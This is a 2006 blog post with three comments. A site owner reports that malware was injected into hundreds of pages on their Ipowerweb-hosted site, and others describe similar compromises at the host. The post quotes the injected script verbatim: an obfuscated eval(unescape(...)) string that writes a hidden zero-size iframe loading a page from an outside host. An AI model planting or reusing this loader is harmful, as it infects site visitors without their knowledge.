2/27/2006

More Hackers - Who's Side Are They On?

It appears that our web site has been yet hacked again. Here's the crap that is on every html page on here. (Over 700) script language="javascript">eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%61%74%65%63%68%2E%63%6F%2E%6B%72%2F%6D%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B'))/script. Update: I called Ipowerweb three times, the last being this morning. They concur that the "Script" is a virus, and that it's up to me to remove the code. So now what? Delete everything? Or sit here all day and manually go through several hundered pages? I have a feeling that someone who does not like my political views is behind this. The good thing is that i saved my referer logs and should be able to spot where and when they did this. Also, where's there's smoke, there's fire. I have to password protect the whole site in the meantime, as not to spread this virus. To the person(s) who are behind this, you"ll get yours, not from me, but from bad karma. It 's a given. P.S. I managed to delete the code from the blog by republishing it entirely from Blogger. As for the rest of the site, I will delete and start anew.

3 comments:

  1. OK,..I'm confused,..was the hack a result of a virus or was the virus implanted into your javascript?

    ReplyDelete
  2. It was/is a virus on the Server. Hosted at Ipowerweb. They have done nothing to prevent it. It also is on my other web site, www.cliftonrams.com. The code it writes to each .html and .php file. When I upload new clean files via FTP, they get the code added.

    At the first sign of them on here I'm pulling the plug. Also, I'm looking for a new web host, as Ipower seems to not give a crap about the possibly hundreds of other clients whos server space is compromised.

    Cheers.

    ReplyDelete
  3. Just to let you know that I have had five seperate clients who use iPower had their websites hacked since the end of January. Some of them with CMS (index.php) some with strictly static sites (index.html).
    Hacking is generally not personal, fyi. They are like car thieves-- they generally go after an easy target. Like when you leave the doors unlocked or in an area that isn't heavily trafficed. iPower appears to be leaving the doors unlocked or isn't watching their security carefully. Each time I've called, they have tried to make it seem like 'your password must be too easy' when some of these clients have extremely strong passwords. I was convinced that there was a back entrance at iPower as soon as the third one hit. Now a 5th client has called me today.
    As happy as I've been with iPower up to this point, I'm going to have to stop recommending them to clients because 2 months is too long for a problem of this magnitude to continue.
    Good luck with your recovery.

    ReplyDelete

Feel free to post your thoughts... Try to keep it clean.